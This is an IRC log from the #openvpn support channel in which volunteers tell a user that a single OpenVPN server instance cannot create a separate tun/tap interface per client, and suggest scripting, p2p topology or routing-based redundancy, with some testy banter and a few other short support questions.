14:02 -!- brute11k [~brute11k@89.249.230.207] has quit [Ping timeout: 255 seconds]
14:04 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
14:04 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
14:04 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
14:04 -!- mode/#openvpn [+o krzee] by ChanServ
14:05 -!- brute11k [~brute11k@89.249.230.108] has joined #openvpn
14:09 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit []
14:12 -!- brute11k [~brute11k@89.249.230.108] has quit [Quit: Leaving.]
14:15 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn
14:15 -!- mode/#openvpn [+o EugeneKay] by ChanServ
14:15 <@EugeneKay> Ergh, wrong alias
14:16 -!- mode/#openvpn [+v EugeneKay] by EugeneKay
14:16 <+EugeneKay> There.
14:16 -!- mode/#openvpn [-o EugeneKay] by EugeneKay
14:17 <+pekster> What, no alias to undo the damage caused by that one and +v-o you? :P
14:17 <+pekster> /ohwaitIdidntwantthatone
14:17 <+EugeneKay> Just talking out loud
14:18 <+pekster> Sometimes it helps. Late last night I got my IPv6 routing fixed after I asked (and then answered) my own question in another network :)
14:18 < rob0> you can "/mode +v-o EugeneKay EugeneKay" in one command, fwiw
14:19 <+EugeneKay> Meh, laziness.
14:19 <+pekster> But, The Internet wants to help make your IRC experience as efficient as possible :D
14:19 <+EugeneKay> The internet is for porn
14:20 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
14:22 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 276 seconds]
14:31 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving]
14:32 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
14:32 -!- mode/#openvpn [+o krzee] by ChanServ
14:33 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds]
14:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection]
14:34 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 255 seconds]
14:34 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
14:34 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
14:34 -!- mode/#openvpn [+o krzee] by ChanServ
14:35 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 245 seconds]
14:48 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
14:52 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds]
14:53 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds]
14:54 -!- zz_AsadH is now known as AsadH
15:15 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
15:19 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
15:20 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
15:26 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds]
15:29 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
15:31 -!- voyo [~voyo@213-134-188-198.home.aster.pl] has joined #openvpn
15:32 < voyo> hello, I'd like to configure an openvpn server with a separate interface (tun or tap) for each connecting client. is that possible using config options?
15:33 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds]
15:34 <+pekster> voyo: Not with a single instance, no. Either use unique instances per client or find another way to do what you want. Why do you want unique devices for each client anyway?
15:36 < voyo> pekster: want to do more complex setups. I don't even want openvpn to assign the IP address, I want to do it all myself (addresses, routes, rules, qos, & more). but as a 1st step I need a separate interface per connecting client.
15:36 <+pekster> No, you don't
15:36 < voyo> ?
15:36 <+pekster> Use a --client-connect script and you can manage the IP assignment all on your own
15:37 <+pekster> You have absolutely no need to use a separate device on the server-side for every connecting client to do what you want
15:37 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 246 seconds]
15:37 < voyo> yes, I know this. but it's more convenient for me to configure it myself (ofc automatically, but without the attention of the openvpn process).
15:37 < voyo> pekster: yes I do. I know what I need ;)
15:38 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn
15:38 <+pekster> Well, I manage to QoS and firewall users, and even give unique sets of users different routes to various corporate networks and assign some by known-IPs, all with a single instance
15:39 < voyo> pekster: but a separate instance is not very convenient, I have to have a separate listening port. no other options?
15:39 <+pekster> But you're also free to start a separate VPN service for every connecting client. Remember that you need a unique network range and port for every client
15:39 <+pekster> voyo: The other option is to design your system properly. You're going about this completely the wrong way
15:40 < voyo> pekster: ok, how do you want to do bonding without a separate interface?
15:40 <+pekster> Bond outside of openvpn and tunnel across a bonded interface if that's what you want
15:40 < voyo> qos without a separate interface is also very limited.
15:41 < voyo> yes it is :)
15:41 < voyo> anyway that's not the matter of my question
15:41 <+pekster> Not if you write proper rules. QoS can filter/match on whatever you'd like (in Linux, the combination of tc and netfilter is very powerful)
15:41 < voyo> yes I know all of that.
15:42 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
15:42 < voyo> I only need to run a separate interface for every connecting client.
15:42 < voyo> do you know if this was possible in an older openvpn version? I've read something like that..
15:42 <+pekster> I don't understand the question. OpenVPN has always let you run as many instances as you'd like
15:43 <+pekster> There has never been and never will be a config option to create a separate tun/tap device for each connecting client. The device is bound to the instance, like any other networking protocol on the planet
15:43 < voyo> yes yes, but in a single instance.
15:43 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
15:43 <+pekster> (technically speaking it binds to the socket, which then sends to an interface, but that's not really important for this discussion)
15:44 <+pekster> No, you cannot do that, for the 3rd time
15:44 < voyo> like hm... running a single instance, listening on port 1094, then if a client connects it spawns a new instance (if needed?), or just creates a new interface for every client
15:44 <+pekster> I understand your question. Stop asking it, because the answer is still no. OpenVPN does not work like that
15:44 <+pekster> !howto
15:44 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
15:45 < voyo> ok ok. I've read all the manuals.
15:45 < voyo> and that's why I'm here on IRC
15:45 < voyo> to get help and answers on things which are not there ;)
15:46 < voyo> and what about running it from inetd? possible? (regarding my demands)
15:47 <+pekster> See the --inetd config option: openvpn can run via inetd, but you need a separate line-item for each port you're listening on, with a unique configuration for each port
15:47 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds]
15:47 < voyo> hm ... ok... that's also not very convenient :/
15:47 <+pekster> What you want is the standard multi-client mode and to handle your special needs via scripting and post-connection process calls. Given that those scripts can do anything you can program, I can't imagine how that isn't enough for you
15:49 < voyo> yes, exactly, I need multi-client mode, with scripting (just the possibility of "external" configuration of the client). but important is a separate interface for every new client.
15:50 < voyo> seems I have to patch it myself.. shame
15:51 <+pekster> You haven't explained why you can't use post-connect scripts. The idea of "bonding" only ever makes sense when you have multipath routing and wish to combine multiple physical links. OpenVPN is a virtual link, not a physical one, so the notion of bonding over it is pointless
15:51 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
15:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
15:52 <+pekster> I'm happy to answer questions that might lead to a better use of the tools you have available, but no one here can help with what you're asking for as it doesn't exist and never will
15:52 < voyo> from what I've read, the option ifconfig-pool-linear or topology p2p should probably work like I need, but I tried, and it's not
15:52 <+pekster> ifconfig-pool-linear is deprecated; use topology subnet instead
15:53 < voyo> what about "topology p2p"?
15:53 <+pekster> You can use p2p topology if supporting Windows clients is not required, if you'd prefer not to push the entire subnet implicitly
15:53 <+pekster> With proper firewalling the security benefits of p2p are negligible, so it's really just about supporting Windows and/or making client communication to other clients a bit easier
15:53 -!- digilink [~digilink@unaffiliated/digilink] has quit [Read error: Connection reset by peer]
15:54 < voyo> yes, I don't have Windows clients
15:54 <+pekster> topology p2p is fine then
15:54 <+pekster> Each connecting client gets a Point-to-Point interface configuration, much like you'd expect with a sit or GRE tunnel (but done via tun and OpenVPN)
15:54 < voyo> but it seems it's still not working (or there is a bug) like I wanted (and described here)
15:55 < voyo> new interfaces are not created. only a single one exists.
15:55 < voyo> I'd expected to have more interfaces when using this option
15:55 <+pekster> Correct. This is how OpenVPN works. There is no bug
15:55 < voyo> am I right?
15:55 <+pekster> No, you are not
15:55 < voyo> erm
15:55 < voyo> I'm confused.
15:55 <+pekster> What "bug" do you have? If you cannot ping across the PtP link after OpenVPN connects, then you have made a mistake in your setup, probably in your firewall as OpenVPN logs most other connection errors
15:56 < voyo> I mean, I expected, when using the p2p option, it should create a new p2p interface for every connecting client?
15:56 <+pekster> Nope
15:57 < voyo> hm...
15:57 <+pekster> The server will allocate tun0 (or whatever you called it.) It gets a PtP setup, for example, '10.8.0.1/32 peer 10.8.0.0'
15:57 < rob0> Pro tip: never suggest "bug" unless you are very confident in your understanding of the software, and even then, it's better to let the developers who fix it be the first to call it a bug.
15:57 < voyo> hehe yes, right. sorry :P
15:57 <+pekster> rob0: Better yet, send the devs a patch fixing the bug, demonstrating that you can read the sources and are more likely to have actually discovered it is, in fact, a bug :D
15:58 <+pekster> <3
15:58 < rob0> well, of course, if you know how to find it and fix it, you should. :)
15:58 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn
15:59 < rob0> in that case you are a "developer"
15:59 < voyo> anyway I'm not the first noob from the street, I've been using openvpn for years. just now I have special needs for a special customer...
16:00 <+pekster> You've still, near as I can tell, failed to explain why you can't use PtP connectivity and handle your QoS, IP-assignment, routing, and firewalling with script hooks
16:01 -!- emmanuel__ [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:02 < voyo> I have to have a separate interface for every connecting client. I don't want to (can't) tell all the reasons why. My customer needs this.
16:02 <+pekster> Then we can't help you
16:02 <+pekster> !topsecret
16:02 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust.
16:02 < voyo> qos, bonding, that should explain most.
16:03 < voyo> no, it's not a matter of trust. and I can post all openvpn configs
16:03 <+pekster> I already told you why bonding doesn't apply to virtual devices. If you have such a secret setup you can't talk about it, then you need to stop wasting our time
16:03 -!- emmanuel__ [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer]
16:03 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.]
16:03 < voyo> yes it does.
16:03 < voyo> I'm successfully bonding GRE tunnels.
16:04 < voyo> but that's not the matter of my problem. now I need openvpn too
16:05 < voyo> so I need to find an answer - if I can do this with openvpn somehow (what I'd like to do, because I know and trust openvpn), or make some (preferably easy) changes to the openvpn source code, or - find another vpn solution which fits my needs.
16:06 <+pekster> Then go find another solution. No one here is forcing you to use openvpn. We're unpaid volunteers giving back to the community, not your custom team of crackpot programmers
16:07 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
16:09 < voyo> sure I know. I'm not demanding anything from you
16:10 < voyo> just asking if what I need is possible
16:10 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds]
16:11 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
16:12 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 240 seconds]
16:12 < voyo> I even told you I'm able to code the required change myself, and give it back to the community. you don't need to be rude.
16:14 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
16:14 -!- Starscreamer [~starscrea@b0ff367c.bb.sky.com] has joined #openvpn
16:15 <@ecrist> voyo: what are you looking for?
16:16 < voyo> ecrist: the possibility to run on the server a new interface for every connecting client
16:16 < voyo> (easily)
16:16 <@ecrist> openvpn does not support that
16:16 < pppingme> voyo each instance of openvpn running creates ONE interface, if you want multiple interfaces, you have to run multiple instances
16:16 < pppingme> I have a feeling what you really want is this:
16:17 < voyo> yes, I know that already. pekster has explained that to me. I wanted to make sure, and ask here, after I've read all the docs, howtos etc.
16:17 <@ecrist> there was an old version of openvpn that did this
16:17 <@ecrist> but we're talking 8 years ago
16:17 < pppingme> no, the old version was still 1 instance=1 interface
16:18 < pppingme> wasn't it?
16:18 <@krzee> pekster, I watched that video with djb twice and did not see anything about md5/sha1 in openssl.cnf
16:18 < pppingme> or is there something I'm not remembering?
16:18 < voyo> ecrist: ha! so I was right! I wasn't sure, but I think openvpn was working like that a few years ago when I was playing with it. can you point me to this version?
16:18 <@krzee> still a badass video tho
16:18 <@ecrist> no, iirc early openvpn (like 1.x) did a separate tun interface per client
16:19 < voyo> ok, I'll check this trace. maybe I'll easily adopt this back into the new version.
16:19 < pppingme> voyo what I think you really want is --client-to-client, make sure it's NOT enabled..
16:19 <@ecrist> voyo: quite honestly, we don't want it
16:20 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds]
16:20 <@krzee> lol
16:20 <@krzee> seriously, why would we want that?
16:20 <@krzee> we have client/server working fine with 1 interface and WITH forward security
16:20 < voyo> ecrist: sure, I know, that's why it's not in the new version. but I need this ;)
16:20 < pppingme> WHY do you need it? what's your goal in it?
16:20 <@krzee> you likely don't, you likely just need to understand more
16:20 <@ecrist> can I ask, why? what are you trying to do?
16:21 < voyo> why I need this - because of QoS, bonding, and some other things
16:21 <@krzee> you don't need that for qos or bonding
16:21 <@ecrist> or likely, "other things"
16:21 <@krzee> and you do need tap (not tun) if you wanna do bonding
16:22 < ngharo> http://www.2dayblog.com/images/2011/november/550x-I-NEED-DIS.jpg
16:22 < voyo> how can you bond interfaces without having a separate interface for each client? :)
16:22 <@ecrist> what are you bonding?
16:22 <@krzee> and how you gunna ethernet bond tun devices?
16:22 < voyo> krzee: well, I have the possibility to bond both tun and tap interfaces. doesn't matter for me (much).
16:22 < pppingme> what is your goal in bonding? clients (and you) probably only have one internet connection anyway, so bringing up two or three "instances" and bonding them together buys you nothing..
16:23 <@krzee> what's your ACTUAL goal
16:23 <@krzee> we can't help you if you are vague and sound like you dunno what you want
16:24 < voyo> ok. ok. I'm working for a bonding company. we are creating bonding/loadbalancing solutions (for internet links).
16:24 <@krzee> a bonding company?
16:24 < pppingme> ok, but it still comes down to the clients only have ONE connection, there is nothing to bond..
16:25 < voyo> currently I'm successfully bonding virtual interfaces like GRE, and even vtun (your "competition"), so I know how to bond tun/tap.
16:25 <+pekster> Fantastic. Let them have the feature-creep. Unixes pride themselves (most of the time) on "one task, one program"
16:25 < voyo> but I prefer openvpn to vtun. for some reasons it's not as stable as openvpn.
16:26 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: I'm going away]
16:27 < voyo> it's not a problem for the customer to have multiple links to the internet, and some of them wan't to bond vpn links too. (over different wan links ofc).
16:27 < voyo> all clear now?
16:28 < voyo> *want
16:28 <@ecrist> VPN clients have multiple tun/tap interfaces, the server does not, unless you operate in P2P mode
16:28 < pppingme> then their connections need to be bonded at the router/isp level, in which case it becomes invisible to applications (like openvpn)
16:28 <+pekster> Not at all. Do GRE/sit/whatever, create your bond0 or what have you from it, and run openvpn over bond0. Your problem is as simple as that. Bonding, plus transit-level security provided by openvpn.
16:29 < voyo> ecrist: yeah, I tried to enable the "ifconfig-pool-linear" directive, or "topology p2p", but still it didn't give me separate interfaces :(
16:29 <@ecrist> p2p requires a separate openvpn instance for every connection
16:29 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
16:29 <@ecrist> ifconfig-pool-linear isn't even related
16:29 <+pekster> 'topology p2p' does not, however. That uses multi-client mode issuing Point-to-Point setups to all clients
16:29 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
16:30 < voyo> ecrist: oki. I think I know all now. I'll try to implement part of code from 1.x version. maybe it will fit my demands.
16:30 <@ecrist> don't bother pushing it upstream
16:31 < voyo> ok. there surely were reasons you don't support this in 2.2 and it was removed
16:31 < pppingme> voyo if you're just trying to "cowboy" all this stuff together, then you're going to quickly end up with a high maintenance unsupported configuration, of course that's what some consultants seem to thrive on, screwing their clients..
16:31 <@ecrist> mostly, it's dumb. :)
16:32 < voyo> anyway tnx guys, I only wanted to know if what I want is possible with openvpn.
16:33 < rob0> What was removed?
16:33 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
16:33 < rob0> "I'll try to implement part of code from 1.x version," what in particular?
16:34 <@ecrist> he's referring to the old, new tun/tap interface for every client
16:34 < voyo> something dumb and that noone cares about anymore.
16:34 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds]
16:34 < rob0> that still exists ...
16:34 <@ecrist> it does?
16:34 < rob0> p2p mode?
16:35 <@ecrist> heh, he wants one openvpn server instance
16:35 < rob0> oh.
16:35 < voyo> it's not creating a separate interface for every connecting client
16:36 < rob0> Someone came up with a hack for that, with several listening p2p instances and selective DNAT to each one.
16:36 < rob0> this was in the pre-2.0 days
16:36 < voyo> too complex and unreliable.
16:37 < voyo> better is one instance, spawning (if needed actually) a new openvpn process (thread?), and creating a separate interface for this connection.
16:38 < pppingme> I'm still not sure I've heard a good reason for separate interfaces that isn't more cleanly addressed at another level outside of openvpn
16:41 < voyo> pppingme better QoS handling, bonding, problem finding with tcpdump, running selective IDS, stats (from interface, snmp), that's all that comes to my mind in just a second. I think I can imagine much more after more time... ;)
16:42 <@krzee> bonding server instances?
16:43 <@krzee> qos is fine in the firewall
16:43 <@krzee> tcpdump should work fine if you understand how to use it (filter by client vpn ip)
16:43 < voyo> krzee: bonding interfaces
16:43 <@krzee> IDS, same answer as qos
16:43 <@krzee> bonding interfaces on the SERVER?
16:43 < voyo> yes
16:44 < voyo> for 'download' traffic
16:44 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has quit []
16:44 < pppingme> voyo every single issue you bring up is more cleanly addressed outside of openvpn
16:44 < voyo> if you say so
16:45 <@krzee> i agree with him, but if you wanna run a separate openvpn per client, feel free. i HIGHLY doubt the software will be changing to meet that need so feel free to script something up
16:45 < voyo> I'm not saying it is not possible (besides bonding), but it is just *much* easier when having separate interfaces..
16:45 < pppingme> I DO say so, and there are probably better ways of doing everything you're asking for
16:45 <@krzee> yep, but bottom line is… if you wanna, go for it
16:45 < pppingme> is your primary goal redundancy, or throughput?
16:46 < voyo> pppingme: with openvpn as uplink - redundancy+security
16:47 <@krzee> you're bonding the service interface to something for redundancy?
16:47 <@krzee> o_O
16:47 < pppingme> are these site to site connections, or direct client connections?
16:47 <@krzee> server interface*
16:48 < voyo> krzee: you can use separate links for redundancy, but you will surely lose some (a large amount rather) packets when one link goes down. it's better to bond them.
16:49 < pppingme> voyo are these site to site connections, or direct client connections?
16:49 < voyo> pppingme: mostly cpe=>central server=>internet, but also cpe1=>server=>cpe2
16:49 < pppingme> so cpe=site, not individual, right?
16:50 < voyo> yes cpe means site, let's say "branch office"
16:50 < pppingme> and these "sites" have more than one internet connection, or just one?
16:51 < voyo> more
16:51 <@krzee> and when the server itself goes down? if you want real redundancy shouldn't you implement multiple servers and make a darknet?
16:51 < voyo> :) guess
16:52 < pppingme> then here's the simple solution, build SIMPLE tunnels, however you want, openvpn, gre, whatever, then run ospf (or if your IQ isn't up to ospf, use the dummied version, rip2)
16:52 < voyo> CPE can be configured even to use a 'normal' link as a backup, when everything else fails. or even can have 3G backup as a last resort. some customers are demanding..
16:52 < pppingme> all done
16:52 <+pekster> pppingme: Yea, I've listed that solution twice now. I've stopped trying
16:52 <@krzee> we get people looking for redundancy VERY often, you're the first to want to ethernet bond server vpn interfaces to accomplish it lol
16:52 < pppingme> it's what I do
16:53 <+pekster> Indeed. It's what any network professional does: add redundancy, then add a security layer on top. Could be TLS, or IPsec, or openvpn, or w/e depending on high level needs
16:53 < voyo> pppingme: you don't need to offend me, my IQ is enough even to set up iBGP :P
16:54 <@krzee> lol
16:54 < pppingme> but it's not high enough to get the point that bonding at the vpn layer is generally BAD news
16:54 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
16:54 <@krzee> screw it, let him implement his own fail
16:54 <+pekster> pppingme: Doing that is more than bad news in my opinion; it's an OSI layering violation too ;)
16:54  * pppingme gets the bonus point!
16:54 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has joined #openvpn
16:55 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
16:55 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
16:55 < voyo> pppingme: I'm telling it's the best solution, I already know all the pros and cons. I'm just working for someone who is paying for my bread and butter, and who is telling me that he WANTS this. that's all.
16:56  * voyo scores one more bonus point...
16:56 < pppingme> voyo if you're a true consultant, or a good employee, then you will explain to your boss why this is bad and give a better solution
16:56 <@ecrist> pppingme++
16:56 < voyo> lol
16:56 < voyo> you should try to live longer then ;)
16:58 < pppingme> I will live longer, I'm not stressing over very fragile setups that cause all sorts of problems, when I implement a solution, it's SOLID, and just plain works!
16:58 < voyo> good for you :)
16:58 <@krzee> 1) explain why FAIL is bad, explain how DOES is better 2) implement DOES 3) ??? 4) profit
17:00 < pppingme> krzee you're forgetting, 4) profit won't happen, consultants make money when they implement a bad solution and get to keep going back to fix it..
17:00 <+pekster> Good consultant can make money doing the right thing, and sometimes someone even notices it ;) 17:01 <@krzee> i always got tons of referrals because im never needed after i setup the DOES 17:01 <+pekster> Well, everyone except RMS, but that's why he's not a consultant :P 17:01 <@krzee> given enough time RMS or hitler always shows up in a conversation 17:01 < pppingme> yeah, but some consultants don't get that. I once had a client ask me, "Didn't you just fix yourself out of a job?" 17:01 <@krzee> often at the same time iirc ;] 17:01 < voyo> I bet guys you are all young yet ;) trust me, sometimes its realy better to do what someone wants and get paid for this. not explaining anything and forcing yours "better solution" (tm). 17:02 <@krzee> i guess you havnt had to clean up enoughj bad solutions yet 17:02 <@krzee> after a certain point you realize doing things wrong is bad 17:02 <+pekster> And doing bad things is usually wrong too (morally, anyway) 17:02 <@krzee> around that time you stop implimenting bad solutions ;] 17:02 < pppingme> voyo how old are you? I'm willing to bet I'm older and much more experienced than you at implementing network, especially wan, solutions. 17:03 < voyo> sure. always after I get paid after it. then implementing another, possibly better solution ;) all depends on customer whom to you working with. 17:03 <+pekster> krzee: So, not that this will change your mind, but my IPv6 setup with the sixxs.net tunnel broker was suprisingly smooth. Come join the fun someday ;) 17:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 276 seconds] 17:04 <@krzee> one day =] 17:04 <@krzee> (kicking and screaming) 17:04 < voyo> pppingme : Im old enough to not rival in this game ;) 17:05 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:06 < pppingme> rival? 
you already lost 17:08 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 17:09 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds] 17:10 <@krzee> basically, you're one of those techs who will impliment fail, knowing its fail, simply so you can get paid to go back… amirite? 17:10 < voyo> kk gus, enough wasting time for me. tnx for your answers. g2g. 17:10 <@krzee> adios 17:10 < voyo> krzee : some day you will learn that they are kind of customers, for which or you are doing what they said and you will get well paid, or you are forced to find somewhere else your bread (but without butter this time). 17:12 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 17:14 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:16 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 17:18 -!- oyunokata [~rrinehart@209.163.177.130] has quit [Ping timeout: 240 seconds] 17:20 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 17:20 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Quit: No Ping reply in 180 seconds.] 17:20 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 17:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 17:30 -!- Starscreamer [~starscrea@b0ff367c.bb.sky.com] has quit [Quit: Colloquy for iPad - http://colloquy.mobi] 17:30 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 17:32 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 17:35 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 17:35 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 17:36 -!- raidz is now known as raidz_away 17:38 < jY> can you use --inactive with keepalive? 
17:40 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 17:41 <+pekster> jY: Yes, because --inactive only considers data packets for activity timers, and the --ping feature is a TLS-level packet 17:41 < jY> great thanks 17:41 <+pekster> (that's in the manpage, btw) 17:47 -!- raidz_away is now known as raidz 17:54 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 248 seconds] 17:55 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 18:03 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 18:08 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 18:11 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:18 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 18:19 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds] 18:20 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:21 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 18:22 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Remote host closed the connection] 18:24 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 18:27 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 18:30 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:38 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 18:41 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:49 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 19:00 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 19:02 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 19:02 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 248 seconds] 19:02 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] 
has joined #openvpn 19:04 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:06 -!- oyunokata [~rrinehart@71.21.227.159] has joined #openvpn 19:08 -!- oyunokata [~rrinehart@71.21.227.159] has quit [Client Quit] 19:09 -!- oyunokata [~rrinehart@71.21.227.159] has joined #openvpn 19:14 -!- oyunokata [~rrinehart@71.21.227.159] has quit [Client Quit] 19:17 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 19:33 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 19:38 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 19:39 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn 19:40 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn 19:41 -!- raidz is now known as raidz_away 19:41 < shadoom> hey, im having problems with the android version of openvpn. I added my ovpn file to my samsung note (4.1.2) added my credentials and hit connect, it doesnt give any errors and i can see some traffic but there is no internet connection to it. I found some fixes online but they all require a rooted device. Did I just do something wrong or do I really have to root my device? 19:41 < shadoom> I also made sure that the ovpn file works on a windows pc 19:42 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 19:43 < cosmicgate> get openvpn for android 19:43 < cosmicgate> it dosnt require root 19:43 < shadoom> yes thats what i did 19:44 < cosmicgate> did the ovpn file work on windows? 
